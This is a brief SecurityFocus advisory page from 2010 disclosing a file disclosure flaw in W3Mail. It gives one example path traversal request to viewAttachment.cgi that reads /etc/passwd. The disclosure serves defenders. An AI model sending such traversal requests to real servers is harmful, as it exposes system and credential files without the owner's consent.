W3Mail File Disclosure Vulnerability

There is no exploit code required. The attacker need only issue a request with the target path, for example:

viewAttachment.cgi?file=../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus